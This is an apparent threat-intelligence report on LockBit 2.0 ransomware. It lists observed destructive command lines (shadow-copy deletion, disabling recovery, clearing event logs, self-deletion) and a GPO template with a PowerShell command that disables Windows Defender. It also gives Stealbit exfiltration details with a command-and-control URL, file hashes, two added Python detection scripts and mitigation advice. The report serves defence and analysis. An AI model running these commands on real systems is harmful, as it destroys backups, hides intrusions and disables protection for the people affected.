Lockbit Ransomware
LockBit 2.0 is the latest version of the ransomware first seen in early September 2019 and previously known as the “.abcd” ransomware. After infiltrating the target network, it uses open-source tools such as mimikatz to obtain the privileges it needs, then encrypts the target system and leaves a ransom note.
Initial Access
For the ransomware to operate on the target network, it must first get into a target system. This initial access can be physical or web-based: phishing, breaches of web-facing applications, zero-day exploitation, weak passwords, exposed RDP or VPN credentials, or brute-force attacks against those protocols can all lead to the ransomware infecting the target network.
Infection
Before doing any damage, the malware checks the user’s language settings. If the language is detected as Eastern European, the ransomware exits without infecting the system. If the language does not match the filter, it runs the checks it needs, and if its privileges are insufficient it performs privilege escalation with tools such as mimikatz. It then deletes the Volume Shadow Copies so that the data cannot be recovered. It enumerates the host configuration, remote shares and storage devices, and starts encryption while excluding the files that basic operating-system functions depend on. LockBit can encrypt the compromised network without any human intervention, copying itself to other systems and moving laterally over SMB and RDP. For data exfiltration it usually uses the Stealbit application, which sends the data out over HTTP; at this stage the attacker may also use Rclone or MEGAsync.
One of the reasons LockBit is so dangerous is its high encryption speed: it encrypts the system quickly using AES (symmetric) encryption.
Indicators (IOC)
Language Indicators
The language codes and filters used by the ransomware’s language filter are as follows (list view). If the list check finds that the user’s language belongs to an Eastern European country, the ransomware exits the system without infecting it.
PowerShell and Command-Line Actions
The command-line actions observed while the ransomware executes on the system are as follows.
cmd.exe /c vssadmin Delete Shadows /All /Quiet
Deletes shadow copies to prevent data recovery.
cmd.exe /c bcdedit /set {default} recoveryenabled No
Disables Windows 10 recovery to prevent data recovery.
cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
Ignores boot failures.
cmd.exe /c wevtutil cl security
Clears the Security event log.
cmd.exe /c wevtutil cl system
Clears the System event log.
cmd.exe /c wevtutil cl application
Clears the Application event log.
cmd.exe "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 >Nul&fsutil file setZeroData offset=0 length=524288 "C:\Users\fred\Desktop\Lsystem-234-bit.exe" & Del /f /q "C:\Users\fred\Desktop\Lsystem-234-bit.exe"
Self-deletion: after a short ping delay it overwrites the first 524288 bytes (512 KB) of its own executable with zeros and then deletes the file.
cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Deletes all shadow copies on the system, disables recovery and ignores boot failures in a single chained command.
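The command lines above are the ones a defender can hunt for in process-creation telemetry (Sysmon Event ID 1 or EDR equivalents). The following is an added detection example, not code from the original post: it runs a small set of rules over constructed process-creation records (the command lines are the ones listed above, the parent names and PIDs are made up) and flags a parent process that chains several anti-recovery actions, which is the pattern LockBit shows here. The rule names and the `min_rules` threshold are this example's own choices.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# Command lines are the ones documented above; PIDs and parents are invented.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "Lsystem-234-bit.exe",
     "cmd": "cmd.exe /c vssadmin Delete Shadows /All /Quiet"},
    {"pid": 4121, "parent": "Lsystem-234-bit.exe",
     "cmd": "cmd.exe /c bcdedit /set {default} recoveryenabled No"},
    {"pid": 4122, "parent": "Lsystem-234-bit.exe",
     "cmd": "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 4123, "parent": "Lsystem-234-bit.exe",
     "cmd": "cmd.exe /c wevtutil cl security"},
    {"pid": 4124, "parent": "Lsystem-234-bit.exe",
     "cmd": ('cmd.exe "C:\\Windows\\System32\\cmd.exe" /C ping 127.0.0.7 -n 3 >Nul'
             '&fsutil file setZeroData offset=0 length=524288 '
             '"C:\\Users\\fred\\Desktop\\Lsystem-234-bit.exe" & Del /f /q '
             '"C:\\Users\\fred\\Desktop\\Lsystem-234-bit.exe"')},
    {"pid": 4127, "parent": "Lsystem-234-bit.exe",
     "cmd": ('cmd.exe "C:\\Windows\\System32\\cmd.exe" /c vssadmin delete shadows '
             '/all /quiet & wmic shadowcopy delete & bcdedit /set {default} '
             'bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no')},
    # Benign look-alikes that must not fire: listing shadows is an admin task.
    {"pid": 4125, "parent": "explorer.exe", "cmd": "cmd.exe /c vssadmin list shadows"},
    {"pid": 4126, "parent": "explorer.exe", "cmd": "notepad.exe C:\\Users\\fred\\notes.txt"},
]

# One rule per anti-recovery / anti-forensics action seen in the command list.
# Case-insensitive because cmd.exe tools accept any casing ("Delete Shadows").
RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I),
    "recovery_disabled": re.compile(
        r"bcdedit\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    "boot_failures_ignored": re.compile(
        r"bcdedit\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
    "event_log_cleared": re.compile(
        r"wevtutil\s+cl\s+(security|system|application)", re.I),
    # Zero-fill of a file followed by deletion in the same command line.
    "self_delete": re.compile(
        r"fsutil\s+file\s+setzerodata.*&\s*del\s+/f\s+/q", re.I | re.S),
}


def classify(cmd):
    """Return the names of all rules that match one command line (in RULES order)."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan(events):
    """Return (pid, parent, matched_rules) for every event that hits at least one rule."""
    hits = []
    for ev in events:
        matched = classify(ev["cmd"])
        if matched:
            hits.append((ev["pid"], ev["parent"], matched))
    return hits


def suspicious_parents(events, min_rules=2):
    """Parents whose children together trip >= min_rules distinct rules.

    A single 'vssadmin delete shadows' can be legitimate maintenance; the same
    parent also disabling recovery and clearing logs is the ransomware pattern.
    """
    per_parent = {}
    for _pid, parent, matched in scan(events):
        per_parent.setdefault(parent, set()).update(matched)
    return {p: sorted(r) for p, r in per_parent.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for pid, parent, matched in scan(SAMPLE_EVENTS):
        print(f"pid={pid} parent={parent} rules={matched}")
    print("chained anti-recovery by:", suspicious_parents(SAMPLE_EVENTS))
```

In production the `cmd` field would come from the Sysmon `CommandLine` value and `parent` from `ParentImage`; the per-parent correlation is what turns five individually noisy events into one high-confidence alert.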
Registry Keys
UAC (User Account Control)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
Data: <LockBit 2.0 ransomware path>
LockBit 2.0 Wallpaper Change
Key: HKEY_CLASSES_ROOT\Lockbit\shell\Open\Command
Data: "C:\Windows\system32\mshta.exe" "C:\Users\<username>\Desktop\LockBit_Ransomware.hta"
Key: HKEY_CLASSES_ROOT\Lockbit\DefaultIcon
Data: C:\Windows\<first 6 characters of the LockBit 2.0 Decryption ID>.ico
Persistence
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}
Data: C:\Users\<username>\Desktop\Lockbit_Ransomware.hta
Data: <LockBit 2.0 ransomware path>
Encryption
Key: HKEY_CURRENT_USER\Software\<LockBit 2.0 ID>\Private
Key: HKEY_CURRENT_USER\Software\<LockBit 2.0 ID>\Public
LockBit 2.0 Icon Location: HKEY_LOCAL_MACHINE\Software\Classes\.lockbit\DefaultIcon
Desktop Modifications
Key: HKEY_CURRENT_USER\Control Panel\Desktop
String Value: %APPDATA%\Local\Temp\<LockBit 2.0 wallpaper>.tmp.bmp
String Value: TileWallpaper = 0
String Value: WallpaperStyle = 2
Created Files and Extensions
C:\Users\<username>\Desktop\LockBit_Ransomware.hta (LockBit 2.0 HTA file)
C:\Windows\<username>\AppData\Local\Temp\<LockBit 2.0 wallpaper>.tmp.bmp (LockBit 2.0 wallpaper)
Disabling Windows Defender with GPO Updates
[General]
Versions=%s
DisplayName=%s
[Software\Policies\Microsoft\Windows Defender;DisableAntiSpyware]
[Software\Policies\Microsoft\Windows Defender\Real-Time Protection;DisableRealTimeMonitoring]
[Software\Policies\Microsoft\Windows Defender\Spynet;SubmitSamplesConsent]
[Software\Policies\Microsoft\Windows Defender\Threats;Threats_ThreatsSeverityDefaultAction]
[Software\Policies\Microsoft\Windows Defender\UX Configuration;Notification_Suppress]
PowerShell Command (Force GPO Update)
powershell.exe -Command "Get-ADComputer -filter * -Searchbase '%s' | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}"
Anti-Recovery Command
C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
File Extension
.lockbit
Lockbit 2.0 Ransom Note
Restore-My-Files.txt
Encryption and Data Exfiltration – Stealbit
Stealbit is a heavily obfuscated application used for data theft. It is built on the Microsoft input/output (I/O) model to make data exfiltration as efficient as possible: the faster and more efficient the exfiltration, the lower the chance of detection.
Stealbit builds the strings and modules it needs at runtime using bitwise operations. The command-and-control IP addresses it connects to are stored encoded and are decoded with a logical AND operation against the value held in the ECX register, using the following key.
Key: 0xF8 0x72 0x12 0x13 0xA6 0x25 0x3C 0xE3 0xF9 0x91 0x2E 0x18 0x20 0x22 0x76
IP Addresses Embedded by Encoding
Sample String Encode and Decode Routine
Decoded IP Address Lists
Performing the Decode Process During Runtime
Stealbit URL Example
hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0
Network Identifier
When the host communicates with the command-and-control server, it sends an HTTP request using the PUT method whose path is a hexadecimal string of 32 to 33 characters. For example:
PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1
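The request shape above (PUT plus a bare 32- or 33-character hex path) is a usable network signature. The following is an added example, not code from the original post: it checks HTTP request lines, as a proxy or IDS would log them, against that shape and extracts the identifier from a Stealbit-style URL. The only real value used is the example URL above; the other request lines are constructed controls, and the function names are this example's own.

```python
import re

# Constructed sample HTTP request lines. The first is the example from the
# post; the rest are made-up controls covering the ways a match can fail.
SAMPLE_REQUESTS = [
    "PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1",   # 33 hex chars
    "GET /index.html HTTP/1.1",                          # wrong method, wrong path
    "PUT /api/v1/upload/06599379103BD9028AB56AE0EBED457D0 HTTP/1.1",  # hex not the whole path
    "PUT /06599379103BD9028AB56AE0EBED457D HTTP/1.1",    # 32 hex chars, still in range
    "PUT /0659937910 HTTP/1.1",                          # too short
    "GET /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1",   # right path, wrong method
]

# RFC 7230 request line: METHOD SP request-target SP HTTP-version
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/\d\.\d$")
# Path must be exactly a slash followed by 32 or 33 hex digits, nothing else.
STEALBIT_PATH = re.compile(r"^/[0-9A-Fa-f]{32,33}$")
# Defanged (hxxp) or live (http) URL whose whole path is the identifier.
STEALBIT_URL = re.compile(r"^(?:hxxp|http)s?://[^/]+/([0-9A-Fa-f]{32,33})$")


def is_stealbit_identifier(request_line):
    """True if the request line is a PUT to a bare 32-33 hex-character path."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return False
    return m.group("method") == "PUT" and bool(STEALBIT_PATH.match(m.group("path")))


def find_stealbit_requests(lines):
    """Filter a list of logged request lines down to the ones matching the signature."""
    return [line for line in lines if is_stealbit_identifier(line)]


def identifier_from_url(url):
    """Return the hex identifier from a Stealbit-style URL, or None if the URL
    does not have that shape. Accepts defanged hxxp:// as well as http://."""
    m = STEALBIT_URL.match(url)
    return m.group(1) if m else None


if __name__ == "__main__":
    for line in find_stealbit_requests(SAMPLE_REQUESTS):
        print("stealbit-like request:", line)
    print(identifier_from_url("hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0"))
```

Matching on method plus exact path length keeps the rule narrow; a PUT whose path merely contains a long hex token (an upload API, for instance) is deliberately not flagged, and the identifier extracted from the URL is what an analyst would pivot on across proxy logs.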
Self-Delete Command
ping 127.0.0.7 -n 7 > Nul & fsutil file setZeroData offset=0 length=<Stealbit file path> & Del /f /q
Hash Records
MD5 SHA-1 SHA-256
af9ff037caca1f316e7d05db86dbd882 844e9b219aaecb26de4994a259f822500fb75ae1 f3e891a2a39dd948cd85e1c8335a83e640d0987dbd48c16001a02f6b7c1733ae
4d25a9242eac26b2240336fb94d62b1e c7b2d4a22f788b1b942f993fff33f233dca960ce f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202
b7f1120bcff47ab77e74e387805feabe a185904a46b0cb87d38057fc591a31e6063cdd95 4de287e0b05e138ab942d71d1d4d2ad5fb7d46a336a446f619091bdace4f2d0a
84866fca8a5ceb187bca8e257e4f875a 038bc02c0997770a1e764d0203303ef8fcad11fb acad2d9b291b5a9662aa1469f96995dc547a45e391af9c7fa24f5921b0128b2c
f91095ae0e0632b0f630e0c4eb12ba10 6c4040f2a76e61c649e1ff4ac564a5951c15d1fa 717585e9605ac2a971b7c7537e6e311bab9db02ecc6451e0efada9b2ff38b474
6fc418ce9b5306b4fd97f815cc9830e5 95838a8beb04cfe6f1ded5ecbd00bf6cf97cd564 0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049
b0916724ff4118bf213e31cd198c0afd 12ac32d012e818c78d6db790f6e11838ca75db88 4bb152c96ba9e25f293bbc03c607918a4452231087053a8cb1a8accb1acc92fd
66b9ccb41b135f302b3143a5d53f4842 3d532697163e7c33c7c906e8efbb08282d3efd75 d089d57b8b2b32ee9816338e96680127babc5d08a03150740a8459c29ab3ba78
MITRE ATT&CK Matrix
Affected Systems
The following system is reported to be affected:
Windows Operating System
Recommended Protection Methods
Against the possibility of ransomware getting into the system, offline data backups should be kept in a trusted location.
All accounts should require a password; passwords should be strong and unique, with a dedicated password policy applied especially to privileged and admin accounts.
Multi-factor authentication should be used when accessing critical systems such as mail, VPN and similar services.
The operating system and installed software should be kept up to date.
Unnecessary admin shares should be removed, or their privileges reduced.
SMB traffic should be allowed only for a limited set of admin accounts, enforced with a host-based firewall.
The Windows file protection feature should be enabled to prevent unauthorized changes to critical files.
The spread of ransomware can be limited by segmenting the existing network into subnets.
Using EDR to identify, detect and investigate anomalies is an effective way to prevent malware from spreading within the network.